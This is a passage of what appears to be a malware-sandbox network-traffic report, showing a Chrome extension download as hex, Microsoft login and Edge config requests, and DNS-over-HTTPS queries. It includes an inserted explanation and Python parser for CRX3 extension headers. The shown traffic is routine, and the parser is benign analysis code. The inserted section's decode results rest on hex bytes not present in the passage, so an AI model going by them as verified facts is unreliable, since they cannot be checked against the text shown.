                                                                                                                                                                                                        2024-11-11 07:11:04 UTC | 1255 | IN | Data Raw: b0 37 f2 10 db 4a 83 aa 5e 0c 32 bb 3b fb 98 59 73 49 d7 47 ad 4e ba d1 5f e9 f2 92 1e 74 df ab 9d 4e 97 e9 c7 79 91 33 79 3f 45 7e 3f b9 30 37 85 39 b3 c4 7c ac cd b9 35 46 ca 7e 4f af af a9 fe ee 6a d5 a8 d3 be 6d da ed b6 de 37 7a b3 ef d5 aa d6 9b 00 04 77 10 4c d9 b0 a5 b9 22 bc 04 60 0d 06 97 ee c6 1a 2d d6 09 7a 18 23 ee 1c 98 76 69 92 9b b4 0e 72 6c 4a 79 6c 11 33 79 6f db 5d ad e7 a7 06 1e 98 2d 36 95 dc b2 f1 0d 55 44 6e f0 83 60 18 5b ba a8 a2 4a c2 40 bc f2 4a 7a 2c cf 38 d8 0c 94 17 c3 56 64 7f 66 1b 73 fa 40 36 7f 96 3b 1e d8 9e 12 27 2a 98 ce fc 96 8b d2 b1 8f 1b 0f 99 61 0f 0a 2f 38 c3 41 03 44 f5 e4 08 a3 cd 21 bc 2c d2 16 01 89 90 48 64 c4 94 5a 41 10 6a 9c ce 28 11 73 16 58 c0 6c 92 bd 85 75 aa 9b 7f 90 29 f8 09 0a 9b 78 a1 88 47 38 cb
                                                                                                                                                                                                        Data Ascii: 7J^2;YsIGN_tNy3y?E~?079|5F~Ojm7zwL"`-z#virlJyl3yo]-6UDn`[J@Jz,8Vdfs@6;'*a/8AD!,HdZAj(sXlu)xG8
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC | 1255 | IN | Data Raw: 54 05 00 01 50 03 fc 66 0a 00 20 00 00 00 00 00 01 00 18 00 00 08 b1 f4 0b 14 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cd 56 cb 6e dc 30 0c bc f7 2b 0c 9f 73 d0 cb b5 37 3f 90 9f e8 45 6b 6b d3 05 bc b6 b1 eb a0 01 82 fc 7b 63 0d 0b d2 95 ec 36 41 d1 f6 42 2c 28 69 38 24 87 f4 be 94 ed 35 f8 39 0c e1 5b 79 ff 52 5e c2 ed e6 1f 43 79 5f 7e 79 52 c1 f8 68 ed 62 dd 61 b1 d6 2c 56 d5 d1 13 fd e6 18 ad 8e 9e a6 7c bd 2b c3 f3 d4 fb c1 cf e7 71 18 4f a7 fe 3c 84 ee 7c f3 c7 3e 74 69 04 e5 22 6a b3 58 0d bc 8e ad 3e 45 d4 78 c7 54 d1 13 59 b8 56 dc 8c 8c 2c fc 4d c1 94 88 6a 24 a6 2b 4e 01 cf 90 02 4e 71 93 d2 8c 56 79 dc 2f 1e c6 f1 b1 0f 11 d5 29 f1 5a 73 79 56 af e3 6f ed 98 18 91 a7 f2 30 0e 22 d8 9a fd 94 8e e4 db fc 1c d1 e2 d4 b3 df 3a 51 96
                                                                                                                                                                                                        Data Ascii: TPf Vn0+s7?Ekk{c6AB,(i8$59[yR^Cy_~yRhba,V|+qO<|>ti"jX>ExTYV,Mj$+NNqVy/)ZsyVo0":Q
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC | 1255 | IN | Data Raw: 25 d3 2c 1e 59 ac 52 aa 91 be 9c 30 a7 f1 f7 05 55 ff 46 65 38 dd da ff 41 5d e3 55 52 e4 87 b3 a7 8d bc bb 80 09 65 52 ae bf cb e0 f3 cf 17 50 4b 07 08 88 5a e2 14 44 02 00 00 d6 0c 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6e 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 50 03 fc 66 0a 00 20 00 00 00 00 00 01 00 18 00 00 08 b1 f4 0b 14 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d5 56 db 6e a3 30 10 7d df af 40 3c a3 8a a4 0d 98 fe 40 7f 62 5f 8c 19 77 23 11 40 49 aa ad 54 f5 df b7 78 06 f9 80 21 81 ae f6 61 5f 2c cb 78 6e 67 ce 1c f3 11 9b 33 e9 2b 35 f4 3b 7e fe 88 4f 74 b9 e8 57 8a 9f e3 9f 6f a9 29 8b 7e 35 da ed 55 bf ea cc ad 6e 6f 2a d8 ef 22
                                                                                                                                                                                                        Data Ascii: %,YR0UFe8A]UReRPKZDPK!-_locales/kn/messages.jsonUTPf Vn0}@<@b_w#@ITx!a_,xng3+5;~OtWo)~5Uno*"
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC | 1255 | IN | Data Raw: b1 df 7e 87 a0 ab 94 bc 8a a2 23 3b 33 ab 1d a9 96 6d b4 27 d4 36 64 0d 6b fa b7 aa b8 b2 43 0e 6d 4c 25 f6 61 b9 10 6f 59 97 62 17 fb dc 1e 24 0e 5c d0 6f 31 65 8b 7c a1 4c c0 c0 35 b5 e2 d8 f5 f5 9a d5 f9 42 3f 5a 45 78 e2 ec ca f3 9b bf 50 4b 07 08 c4 85 2c a4 c0 01 00 00 b3 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 7a 68 5f 54 57 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 50 03 fc 66 0a 00 20 00 00 00 00 00 01 00 18 00 00 08 b1 f4 0b 14 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a5 53 cb 6e dc 30 0c bc f7 2b 02 9f 7b 90 f5 a0 a8 fc 40 7f c2 17 c9 a2 d2 05 bc b6 b1 bb 46 0b 04 f9 f7 92 56 9c d8 d9 2d 50 a0 17 82 20 28 ce 70 38 7a 6d fa 0b c5 1b
                                                                                                                                                                                                        Data Ascii: ~#;3m'6dkCmL%aoYb$\o1e|L5B?ZExPK,PK!-_locales/zh_TW/messages.jsonUTPf Sn0+{@FV-P (p8zm
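The response body in this session (Content-Type: application/x-chrome-extension) opens with 43 72 32 34 03 00 00 00, which the Data Ascii line renders as Cr24: the magic and version of a CRX3 package, the signed container that Chrome and Edge use for extensions. What follows is an added Python example, not code from the Joe Sandbox report or from Chromium. It turns the report's "Data Raw:" hex back into bytes, decodes the fixed CRX3 header and the first RSA signature proof (field numbers as defined in Chromium's crx3.proto), and reads the RSA key size from the DER SubjectPublicKeyInfo. The sample input is the leading 72 bytes of the dump above, constructed inline. Because the report prints only the start of each chunk, the 294-byte public key is cut off; the parser flags that and leaves the extension ID (first 128 bits of SHA-256 over the complete key, each hex digit mapped to a-p) unset rather than deriving one from partial data.

```python
"""Decode a CRX3 (Chrome extension package) header from a Joe Sandbox 'Data Raw:' line.
Added example, not Joe Sandbox or Chromium code. Protobuf field numbers follow Chromium's
crx3.proto: CrxFileHeader.sha256_with_rsa = 2, AsymmetricKeyProof.public_key = 1."""
import hashlib
import re
import struct
from typing import Optional

# Constructed input: the leading 72 bytes of the 682-byte response chunk, as the
# report prints them. The report truncates the dump, so the 294-byte
# SubjectPublicKeyInfo is incomplete and the parser has to say so rather than guess.
SAMPLE_DATA_RAW = (
    "Data Raw: 43 72 32 34 03 00 00 00 e2 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d "
    "06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 "
    "01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e"
)

CRX_MAGIC = b"Cr24"
RSA_OID_TLV = bytes.fromhex("06092a864886f70d010101")  # DER OID 1.2.840.113549.1.1.1


def hex_dump_to_bytes(line: str) -> bytes:
    """Turn a 'Data Raw: 43 72 ...' report line into bytes."""
    hexpart = line.split("Data Raw:", 1)[-1]
    return bytes.fromhex("".join(re.findall(r"\b[0-9a-fA-F]{2}\b", hexpart)))


def read_varint(buf: bytes, pos: int):
    """Protobuf base-128 varint -> (value, next_pos); IndexError if the dump ends early."""
    value = shift = 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7


def der_header(buf: bytes, pos: int):
    """Read one DER tag and length -> (tag, length, value_start)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, length, pos


def rsa_modulus_bits(spki: bytes) -> Optional[int]:
    """Modulus size from SubjectPublicKeyInfo, read from TLV headers only so a truncated
    key still works: SEQ { SEQ { OID, NULL }, BIT STRING { 00, SEQ { INT n, INT e } } }."""
    _, _, p = der_header(spki, 0)                      # outer SEQUENCE
    _, alg_len, alg = der_header(spki, p)              # AlgorithmIdentifier
    if spki[alg:alg + len(RSA_OID_TLV)] != RSA_OID_TLV:
        return None                                    # not rsaEncryption
    tag, _, p = der_header(spki, alg + alg_len)        # BIT STRING
    if tag != 0x03:
        return None
    _, _, p = der_header(spki, p + 1)                  # skip unused-bits byte, RSAPublicKey SEQ
    tag, n_len, p = der_header(spki, p)                # INTEGER modulus
    if tag != 0x02:
        return None
    if spki[p] == 0x00:                                # leading zero keeps the integer positive
        n_len -= 1
    return n_len * 8


def extension_id(spki: bytes) -> str:
    """Chrome extension ID: first 128 bits of SHA-256(SPKI), each hex digit mapped to a-p."""
    return "".join(chr(ord("a") + int(c, 16)) for c in hashlib.sha256(spki).hexdigest()[:32])


def parse_crx3_prefix(data: bytes) -> dict:
    """Decode 'Cr24' | u32 LE version | u32 LE header_len | CrxFileHeader protobuf | ZIP
    far enough to report the first RSA proof's public key."""
    if data[:4] != CRX_MAGIC:
        raise ValueError("not a CRX file")
    version, header_len = struct.unpack_from("<II", data, 4)
    if version != 3:
        raise ValueError(f"unsupported CRX version {version}")
    tag, pos = read_varint(data, 12)                   # CrxFileHeader field tag
    proof_len, pos = read_varint(data, pos)
    key_tag, pos = read_varint(data, pos)              # AsymmetricKeyProof field tag
    key_len, pos = read_varint(data, pos)
    if tag >> 3 != 2 or key_tag >> 3 != 1:
        raise ValueError("unexpected CrxFileHeader layout")
    spki = data[pos:pos + key_len]
    truncated = len(spki) < key_len
    return {
        "version": version,
        "header_len": header_len,
        "payload_offset": 12 + header_len,             # where the ZIP payload begins
        "proof_len": proof_len,
        "public_key_len": key_len,
        "modulus_bits": rsa_modulus_bits(spki),
        "public_key_truncated": truncated,
        # the ID needs the whole key; never derive it from a partial dump
        "extension_id": None if truncated else extension_id(spki),
    }
```

For this dump the header decodes to version 3 with a 5602-byte CrxFileHeader, so by the format's definition the ZIP payload begins at offset 5614, and the first proof (556 bytes) carries a 2048-bit RSA key. Recovering the extension ID or checking the signature needs the complete body from the PCAP, not the truncated display in the report.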


                                                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                        3 | 192.168.11.20 | 49785 | 40.126.29.12 | 443
                                                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                        2024-11-11 07:11:12 UTC | 420 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19042.0.0; IDCRL-cfg 16.000.29143.3; App svchost.exe, 10.0.19041.546, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                        Content-Length: 4742
                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                        2024-11-11 07:11:12 UTC | 4742 | OUT | Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                        2024-11-11 07:11:12 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                        Expires: Mon, 11 Nov 2024 07:10:12 GMT
                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                        x-ms-route-info: C523_BAY
                                                                                                                                                                                                        x-ms-request-id: 9c786621-f926-43d0-80e2-b83385b77239
                                                                                                                                                                                                        PPServer: PPV: 30 H: PH1PEPF0001B894 V: 0
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 07:11:12 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 10197
                                                                                                                                                                                                        2024-11-11 07:11:12 UTC | 10197 | IN | Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                        4 | 192.168.11.20 | 49786 | 20.190.135.7 | 443
                                                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                        2024-11-11 07:11:12 UTC | 420 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19042.0.0; IDCRL-cfg 16.000.29143.3; App svchost.exe, 10.0.19041.546, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                        Content-Length: 4742
                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                        2024-11-11 07:11:12 UTC | 4742 | OUT | Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                        2024-11-11 07:11:12 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                        Expires: Mon, 11 Nov 2024 07:10:12 GMT
                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                        x-ms-route-info: C523_SN1
                                                                                                                                                                                                        x-ms-request-id: afdcde83-861a-482a-a4ac-d44835c22762
                                                                                                                                                                                                        PPServer: PPV: 30 H: SN1PEPF0002F152 V: 0
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 07:11:12 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 10197
                                                                                                                                                                                                        2024-11-11 07:11:12 UTC | 10197 | IN | Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                        5 | 192.168.11.20 | 63505 | 52.123.251.14 | 443 | 6672 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                        2024-11-11 07:11:13 UTC | 610 | OUT | GET /config/v1/Edge/94.0.992.31?clientId=6757335511995507682&osname=win&client=edge&channel=stable&scpfull=0&scpguard=0&scpfre=0&osver=10.0.19042&osarch=x86_64&osedition=professional&wu=1&devicefamily=desktop&uma=0&mngd=0&installdate=1630626147 HTTP/1.1
                                                                                                                                                                                                        Host: config.edge.skype.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        If-None-Match: "mOB9Fluqaq+mietxhYXSL2cAH0KxdzECs1csHpZVA18="
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                                                        2024-11-11 07:11:13 UTC1177INHTTP/1.1 200 OK
                                                                                                                                                                                                        Cache-Control: no-cache,max-age=3600
                                                                                                                                                                                                        Content-Length: 8891
                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                        Expires: Mon, 11 Nov 2024 08:11:13 GMT
                                                                                                                                                                                                        ETag: "i57ge/tW4g+sRME6adKCKTLZkHbagnUsuybi3oPAezs="
                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                        request-id: 1caa353b-3cbd-3d14-5a7a-267070def7c8
                                                                                                                                                                                                        X-BackEndHttpStatus: 200
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                        Report-To: {"group":"NelEcsUpload1","max_age":604800,"endpoints":[{"url":"https://ecs.nel.measure.office.net?TenantId=Edge&DestinationEndpoint=MIRA-SIP-MN2&FrontEnd=MIRA"}],"include_subdomains":true}
                                                                                                                                                                                                        NEL: {"report_to":"NelEcsUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                                                                                                                                                                                                        X-Proxy-RoutingCorrectness: 1
                                                                                                                                                                                                        X-MSEdge-Ref: MIRA: 1caa353b-3cbd-3d14-5a7a-267070def7c8 MN2PR05CA0054 2024-11-11T07:11:13.236Z
                                                                                                                                                                                                        Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000
                                                                                                                                                                                                        X-Proxy-BackendServerStatus: 200
                                                                                                                                                                                                        X-FirstHopCafeEFZ: MNZ
                                                                                                                                                                                                        X-FEProxyInfo: MN2PR05CA0054.NAMPRD05.PROD.OUTLOOK.COM
                                                                                                                                                                                                        X-FEEFZInfo: MNZ
                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                        X-FEServer: MN2PR05CA0054
                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 07:11:12 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        2024-11-11 07:11:13 UTC1756INData Raw: 7b 22 45 43 53 22 3a 7b 22 45 78 63 6c 75 64 65 45 78 74 65 72 6e 61 6c 43 6f 6e 66 69 67 49 64 73 49 6e 4c 6f 67 22 3a 74 72 75 65 2c 22 43 6f 6e 66 69 67 4c 6f 67 54 61 72 67 65 74 22 3a 22 65 64 67 65 5f 73 74 61 62 6c 65 22 7d 2c 22 45 64 67 65 22 3a 7b 22 44 69 73 63 6f 6e 6e 65 63 74 65 64 45 72 72 6f 72 50 61 67 65 56 61 72 69 61 74 69 6f 6e 73 22 3a 7b 22 65 6e 61 62 6c 65 46 65 61 74 75 72 65 73 22 3a 5b 22 6d 73 53 68 6f 77 54 72 6f 75 62 6c 65 73 68 6f 6f 74 42 75 74 74 6f 6e 4f 6e 45 72 72 6f 72 50 61 67 65 22 2c 22 6d 73 44 69 73 63 6f 6e 6e 65 63 74 65 64 45 72 72 6f 72 50 61 67 65 56 61 72 69 61 74 69 6f 6e 32 22 5d 7d 2c 22 54 6f 61 73 74 65 72 22 3a 7b 22 65 6e 61 62 6c 65 46 65 61 74 75 72 65 73 22 3a 5b 22 6d 73 45 64 67 65 44 65 76 54
                                                                                                                                                                                                        Data Ascii: {"ECS":{"ExcludeExternalConfigIdsInLog":true,"ConfigLogTarget":"edge_stable"},"Edge":{"DisconnectedErrorPageVariations":{"enableFeatures":["msShowTroubleshootButtonOnErrorPage","msDisconnectedErrorPageVariation2"]},"Toaster":{"enableFeatures":["msEdgeDevT
                                                                                                                                                                                                        2024-11-11 07:11:13 UTC7135INData Raw: 65 72 4d 65 6e 75 44 69 73 61 62 6c 65 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 22 2c 22 6d 73 45 64 67 65 53 68 6f 70 70 69 6e 67 53 65 74 74 69 6e 67 73 49 6e 50 61 6e 65 22 2c 22 6d 73 45 64 67 65 53 68 6f 70 70 69 6e 67 53 65 74 74 69 6e 67 73 49 6e 50 61 6e 65 4e 6f 74 69 66 69 63 61 74 69 6f 6e 42 6f 74 74 6f 6d 54 6f 67 67 6c 65 22 2c 22 6d 73 51 75 65 72 79 53 68 6f 70 70 69 6e 67 4d 65 74 61 64 61 74 61 22 2c 22 6d 73 53 68 6f 77 52 65 73 75 6c 74 73 53 68 6f 70 70 69 6e 67 4d 65 74 61 64 61 74 61 22 2c 22 6d 73 45 64 67 65 53 68 6f 70 70 69 6e 67 52 65 66 72 65 73 68 22 2c 22 6d 73 45 64 67 65 53 68 6f 70 70 69 6e 67 53 65 74 74 69 6e 67 73 50 72 69 76 61 63 79 53 74 72 69 6e 67 22 5d 2c 22 64 69 73 61 62 6c 65 46 65 61 74 75 72 65 73 22 3a 5b 22
                                                                                                                                                                                                        Data Ascii: erMenuDisableNotifications","msEdgeShoppingSettingsInPane","msEdgeShoppingSettingsInPaneNotificationBottomToggle","msQueryShoppingMetadata","msShowResultsShoppingMetadata","msEdgeShoppingRefresh","msEdgeShoppingSettingsPrivacyString"],"disableFeatures":["


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.20 | 59315 | 149.112.112.112 | 443 | 6672 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 07:11:17 UTC | 233 | OUT | POST /dns-query HTTP/1.1
Host: dns.quad9.net
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-11-11 07:11:17 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-11-11 07:11:17 UTC | 183 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 07:11:17 GMT
Connection: close
Content-Length: 60
Server: h2o/dnsdist
content-type: application/dns-message
cache-control: max-age=161
2024-11-11 07:11:17 UTC | 60 | IN | Data Ascii: wwwgstaticcomi^)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.11.20 | 53091 | 172.64.41.3 | 443 | 6672 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 07:11:17 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-11-11 07:11:17 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-11-11 07:11:17 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 11 Nov 2024 07:11:17 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8e0c77a7f8f8b04e-ATL
alt-svc: h3=":443"; ma=86400
